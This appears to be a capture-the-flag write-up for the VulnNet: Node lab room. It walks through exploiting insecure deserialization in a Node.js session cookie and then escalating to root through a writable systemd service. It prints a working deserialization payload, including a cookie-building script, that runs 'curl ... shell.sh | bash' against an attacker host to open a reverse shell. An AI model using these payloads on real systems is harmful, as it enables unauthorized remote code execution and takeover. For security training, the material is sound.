VulnNet: Node

Scanning

Let's run an nmap scan to find open ports and services.

Enumeration

Let's visit the website on port 8080.

It is a Node.js web page that lists a few names, which we note as potential usernames:

Tilo Mitra, Eric Ferraioulo, Reid Burke and Andrew Wooldridge

Let's look for hidden directories using gobuster.

Let's look at the login page.

We have a login form but no credentials. Let's submit random credentials and inspect what happens with Burp Suite.

Let's capture the request.

The request already carries a session cookie even though we have not logged in yet, which is interesting. Let's send this request to the Repeater tab and test different requests with the cookie we have.

First, let's decode the cookie, since it looks base64-encoded.

So the username is guest and isGuest is set to true. I tried changing the username to admin and logging in, but it did not work, so let's see what the server shows us when the cookie in the request is malformed.

Exploitation

The error shows the web application trying to unserialize the session cookie and failing, so the cookie is handed to a deserializer. Let's look for an exploit for this. I found a blog post that explains the issue and shows how to exploit it.

Reading the blog, we find the exploit we will use.

A string value that starts with the _$$ND_FUNC$$_ marker is evaluated as JavaScript by the deserializer, and ending it with () calls the function at once, so putting one in the cookie gives us code execution inside the web app as soon as the cookie is parsed. Let's use that to get a shell: create a reverse shell script on our machine so the server can curl it and pipe it to bash.

Next we have to change the payload a little so that it gives us a reverse shell.

{"username":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('curl 10.13.8.64:8000/shell.sh | bash ', function(error, stdout, stderr) { console.log(stdout) });\n }()","isAdmin":true,"encoding": "utf-8"}

Next we have to start an HTTP server on our machine to serve shell.sh on port 8000, and a netcat listener for the reverse shell.

Let's base64-encode the payload and replace the current cookie value with it.

Now let's send the request with the new cookie.

The HTTP server should log the request for shell.sh.

And we should have a reverse shell on the listener.
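As an added example, which is not code from the original write-up or from the room, here is a minimal JavaScript model of the deserialization sink described above together with the cookie construction. The unserialize() stand-in does what the node-serialize function does with the _$$ND_FUNC$$_ marker (hands the rest of the string to eval), while leaving out the parts that do not matter for the bug. The guest cookie value, the command string and the global flag used as proof of execution are constructed for the example; the attacker address is the one from the page's payload.

```javascript
// Added example: a minimal model of the vulnerable deserializer and of the
// cookie crafted for it. Not the write-up's or the room's code; the sample
// guest cookie, the command string and the probe flag are constructed for
// illustration. Run with: node this_file.js

const FUNCFLAG = '_$$ND_FUNC$$_';

// Stand-in for node-serialize's unserialize(): parse the JSON, then pass any
// string value that starts with the marker to eval(). The real function also
// walks nested objects and restores circular references, which is irrelevant
// to the bug: the eval() is the sink.
function unserialize(str) {
  const obj = JSON.parse(str);
  for (const key of Object.keys(obj)) {
    const value = obj[key];
    if (typeof value === 'string' && value.startsWith(FUNCFLAG)) {
      obj[key] = eval('(' + value.slice(FUNCFLAG.length) + ')');
    }
  }
  return obj;
}

// Base64-wrapped JSON, the same encoding the cookie was decoded from in Burp.
function encodeCookie(obj) {
  return Buffer.from(JSON.stringify(obj)).toString('base64');
}
function decodeCookie(b64) {
  return JSON.parse(Buffer.from(b64, 'base64').toString('utf8'));
}

// Constructed sample of the pre-login cookie: a guest user with no privileges.
const GUEST_COOKIE = encodeCookie({ username: 'guest', isGuest: true, encoding: 'utf-8' });

// Craft the attack cookie. The username carries a function expression followed
// by "()", so the function is called as a side effect of eval() while the
// cookie is still being parsed; nothing in the application needs to invoke it.
function buildPayloadCookie(command) {
  const body = `function(){ require('child_process').exec(${JSON.stringify(command)}) }()`;
  return encodeCookie({ username: FUNCFLAG + body, isAdmin: true, encoding: 'utf-8' });
}

// Harmless proof that parsing alone executes the embedded code: the IIFE sets
// a global flag instead of running a command. Returns the flag's value.
function parseRunsCode() {
  delete globalThis.__ndProbe;
  const cookie = encodeCookie({
    username: FUNCFLAG + 'function(){ globalThis.__ndProbe = "ran during unserialize" }()',
    isGuest: true,
  });
  unserialize(Buffer.from(cookie, 'base64').toString('utf8'));
  return globalThis.__ndProbe;
}

// The same payload without the trailing "()": eval() yields a function object
// that is stored in the field and never called, so nothing runs.
function parseWithoutCallDoesNotRun() {
  delete globalThis.__ndProbe2;
  const cookie = encodeCookie({
    username: FUNCFLAG + 'function(){ globalThis.__ndProbe2 = "ran" }',
    isGuest: true,
  });
  const obj = unserialize(Buffer.from(cookie, 'base64').toString('utf8'));
  return { ran: globalThis.__ndProbe2 === 'ran', storedAsFunction: typeof obj.username === 'function' };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('guest cookie decodes to:', decodeCookie(GUEST_COOKIE));
  console.log('probe result:', parseRunsCode());
  console.log('without "()":', parseWithoutCallDoesNotRun());
  // Attacker address and command taken from the page's payload.
  console.log('attack cookie:', buildPayloadCookie('curl 10.13.8.64:8000/shell.sh | bash'));
}
```

The two probe functions are the point of the model: a bare function expression behind the marker is deserialized into a function object and sits there harmlessly, while the same expression with () appended runs during unserialize() itself, which is why the page's payload ends in }() and why an isAdmin flag in the same cookie is never checked before the code fires.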

Privilege Escalation

Let's run sudo -l to see what we can run with sudo.

Let's look on GTFOBins for a way to use the allowed binary to switch to the serv-manage user.

Let's run these commands.

We are now serv-manage and can read the user flag.

Let's run sudo -l again.

It looks like we can act on a systemd timer called vulnnet-auto.timer through sudo. Let's look at its unit file.

The timer triggers a service called vulnnet-job.service. Let's check whether we can modify that service's unit file and see what it contains.

The file is writable by us. Let's replace the command the service runs (its ExecStart line) with the reverse shell command we used before, so that the service runs it as root and hands us a root shell.

Let's start a netcat listener, and the HTTP server again if it was stopped.

Now let's stop and start the timer with sudo to trigger the service and get a shell. If the old command still runs, systemd is using its cached copy of the unit and needs a daemon-reload before the edit takes effect, which only helps if the sudo rule allows that too.

We are now root and can read the root flag.
